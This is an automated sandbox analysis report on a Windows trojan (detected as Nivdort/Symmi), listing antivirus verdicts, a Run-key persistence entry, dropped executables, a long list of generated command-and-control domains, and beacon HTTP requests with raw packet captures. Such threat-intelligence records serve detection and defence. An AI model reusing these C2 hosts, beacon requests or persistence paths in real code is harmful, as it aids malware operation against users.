Analysis Date2015-08-27 05:33:48
MD57162f992bbbb23a8f1233657b99653e6
SHA15e7a0e72cc28fbbc89259e3fbb084f388d9d6339

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: a6fc1876169f28bd22c87687a6b93266 sha1: 3c12021efecef7b434c51cd9866e4b9efa365bec size: 300544
Section.rdata md5: 5e886242c5fe802d7df68f8f922eb3b1 sha1: eb3e0492aca7de37cfc7d6b47eb3b919c6a28c69 size: 34304
Section.data md5: 12e28a780c9bea38d6083d8775df61d6 sha1: a898b047106e896e44edf995dc9d3a99d89112cb size: 104448
Timestamp2014-10-30 10:10:09
PackerMicrosoft Visual C++ ?.?
PEhash26768acc75c7c773fb2dd5883dc6e4ff5893b00c
IMPhash12ad70a94c4c136836a8bb73d2a63cb8
AVCA (E-Trust Ino)no_virus
AVF-SecureGen:Variant.Symmi.22722
AVDr. WebTrojan.DownLoader15.31020
AVClamAVno_virus
AVArcabit (arcavir)Gen:Variant.Symmi.22722
AVBullGuardGen:Variant.Symmi.22722
AVPadvishno_virus
AVVirusBlokAda (vba32)no_virus
AVCAT (quickheal)Trojan.Dynamer.AC3
AVTrend MicroTSPY_NIVDORT.SMB
AVKasperskyTrojan.Win32.Generic
AVZillya!no_virus
AVEmsisoftGen:Variant.Symmi.22722
AVIkarusTrojan.FBAccountLock
AVFrisk (f-prot)no_virus
AVAuthentiumW32/Wonton.B.gen!Eldorado
AVMalwareBytesTrojan.Zbot.WHE
AVMicroWorld (escan)Gen:Variant.Symmi.22722
AVMicrosoft Security EssentialsTrojanSpy:Win32/Nivdort.BD
AVK7Trojan ( 004cb2771 )
AVBitDefenderGen:Variant.Symmi.22722
AVFortinetW32/Agent.VNC!tr
AVSymantecDownloader.Upatre!g15
AVGrisoft (avg)Win32/Cryptor
AVEset (nod32)Win32/Agent.VNC
AVAlwil (avast)Malware-gen:Win32:Malware-gen
AVAd-AwareGen:Variant.Symmi.22722
AVTwisterTrojan.Agent.VNC.aanx.mg
AVAvira (antivir)BDS/Zegost.Gen4
AVMcafeeTrojan-FEMT!7162F992BBBB
AVRising0x58045a30

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Multimedia Block Provider Quality NGEN ➝
C:\Documents and Settings\Administrator\Application Data\nxrrtrfjp\znqxjcyykbab.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\nxrrtrfjp\znqxjcyykbab.exe
Creates ProcessC:\Documents and Settings\Administrator\Application Data\nxrrtrfjp\znqxjcyykbab.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\nxrrtrfjp\znqxjcyykbab.exe

Creates FileC:\Documents and Settings\Administrator\Application Data\nxrrtrfjp\rzjykkuzwzmm.exe
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\nxrrtrfjp\znqxjcyykbab.fku5
Creates ProcessWATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\nxrrtrfjp\znqxjcyykbab.exe"

Process
↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\nxrrtrfjp\znqxjcyykbab.exe"

Network Details:

DNSleavethrown.net
Type: A
95.211.230.75
DNSsimplechoose.net
Type: A
123.108.108.168
DNSpossibleperiod.net
Type: A
192.64.119.216
DNSfinishperiod.net
Type: A
50.63.202.32
DNSsweethunger.net
Type: A
DNSprobablyhunger.net
Type: A
DNSsweettraining.net
Type: A
DNSprobablytraining.net
Type: A
DNSsweetstorm.net
Type: A
DNSprobablystorm.net
Type: A
DNSsweetthrown.net
Type: A
DNSprobablythrown.net
Type: A
DNSseveralhunger.net
Type: A
DNSmaterialhunger.net
Type: A
DNSseveraltraining.net
Type: A
DNSmaterialtraining.net
Type: A
DNSseveralstorm.net
Type: A
DNSmaterialstorm.net
Type: A
DNSseveralthrown.net
Type: A
DNSmaterialthrown.net
Type: A
DNSseverachoose.net
Type: A
DNSlaughchoose.net
Type: A
DNSseveraalthough.net
Type: A
DNSlaughalthough.net
Type: A
DNSseveraperiod.net
Type: A
DNSlaughperiod.net
Type: A
DNSseverahowever.net
Type: A
DNSlaughhowever.net
Type: A
DNSmotherchoose.net
Type: A
DNSsimplealthough.net
Type: A
DNSmotheralthough.net
Type: A
DNSsimpleperiod.net
Type: A
DNSmotherperiod.net
Type: A
DNSsimplehowever.net
Type: A
DNSmotherhowever.net
Type: A
DNSmountainchoose.net
Type: A
DNSpossiblechoose.net
Type: A
DNSmountainalthough.net
Type: A
DNSpossiblealthough.net
Type: A
DNSmountainperiod.net
Type: A
DNSmountainhowever.net
Type: A
DNSpossiblehowever.net
Type: A
DNSperhapschoose.net
Type: A
DNSwindowchoose.net
Type: A
DNSperhapsalthough.net
Type: A
DNSwindowalthough.net
Type: A
DNSperhapsperiod.net
Type: A
DNSwindowperiod.net
Type: A
DNSperhapshowever.net
Type: A
DNSwindowhowever.net
Type: A
DNSwinterchoose.net
Type: A
DNSsubjectchoose.net
Type: A
DNSwinteralthough.net
Type: A
DNSsubjectalthough.net
Type: A
DNSwinterperiod.net
Type: A
DNSsubjectperiod.net
Type: A
DNSwinterhowever.net
Type: A
DNSsubjecthowever.net
Type: A
DNSfinishchoose.net
Type: A
DNSleavechoose.net
Type: A
DNSfinishalthough.net
Type: A
DNSleavealthough.net
Type: A
DNSleaveperiod.net
Type: A
DNSfinishhowever.net
Type: A
DNSleavehowever.net
Type: A
DNSsweetchoose.net
Type: A
DNSprobablychoose.net
Type: A
DNSsweetalthough.net
Type: A
DNSprobablyalthough.net
Type: A
DNSsweetperiod.net
Type: A
DNSprobablyperiod.net
Type: A
DNSsweethowever.net
Type: A
DNSprobablyhowever.net
Type: A
DNSseveralchoose.net
Type: A
DNSmaterialchoose.net
Type: A
DNSseveralalthough.net
Type: A
DNSmaterialalthough.net
Type: A
DNSseveralperiod.net
Type: A
DNSmaterialperiod.net
Type: A
DNSseveralhowever.net
Type: A
DNSmaterialhowever.net
Type: A
DNSseverasingle.net
Type: A
DNSlaughsingle.net
Type: A
DNSseveracharge.net
Type: A
DNSlaughcharge.net
Type: A
HTTP GEThttp://leavethrown.net/index.php?email=gmkj13@szgmled.com&method=post&len
User-Agent:
HTTP GEThttp://simplechoose.net/index.php?email=gmkj13@szgmled.com&method=post&len
User-Agent:
HTTP GEThttp://possibleperiod.net/index.php?email=gmkj13@szgmled.com&method=post&len
User-Agent:
HTTP GEThttp://finishperiod.net/index.php?email=gmkj13@szgmled.com&method=post&len
User-Agent:
Flows TCP192.168.1.1:1031 ➝ 95.211.230.75:80
Flows TCP192.168.1.1:1032 ➝ 123.108.108.168:80
Flows TCP192.168.1.1:1033 ➝ 192.64.119.216:80
Flows TCP192.168.1.1:1034 ➝ 50.63.202.32:80

Raw Pcap
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d676d6b 6a313340 737a676d   mail=gmkj13@szgm
0x00000020 (00032)   6c65642e 636f6d26 6d657468 6f643d70   led.com&method=p
0x00000030 (00048)   6f737426 6c656e20 48545450 2f312e30   ost&len HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 6c656176 65746872   ..Host: leavethr
0x00000070 (00112)   6f776e2e 6e65740d 0a0d0a              own.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d676d6b 6a313340 737a676d   mail=gmkj13@szgm
0x00000020 (00032)   6c65642e 636f6d26 6d657468 6f643d70   led.com&method=p
0x00000030 (00048)   6f737426 6c656e20 48545450 2f312e30   ost&len HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 73696d70 6c656368   ..Host: simplech
0x00000070 (00112)   6f6f7365 2e6e6574 0d0a0d0a            oose.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d676d6b 6a313340 737a676d   mail=gmkj13@szgm
0x00000020 (00032)   6c65642e 636f6d26 6d657468 6f643d70   led.com&method=p
0x00000030 (00048)   6f737426 6c656e20 48545450 2f312e30   ost&len HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 706f7373 69626c65   ..Host: possible
0x00000070 (00112)   70657269 6f642e6e 65740d0a 0d0a       period.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d676d6b 6a313340 737a676d   mail=gmkj13@szgm
0x00000020 (00032)   6c65642e 636f6d26 6d657468 6f643d70   led.com&method=p
0x00000030 (00048)   6f737426 6c656e20 48545450 2f312e30   ost&len HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 66696e69 73687065   ..Host: finishpe
0x00000070 (00112)   72696f64 2e6e6574 0d0a0d0a 0d0a       riod.net......


Strings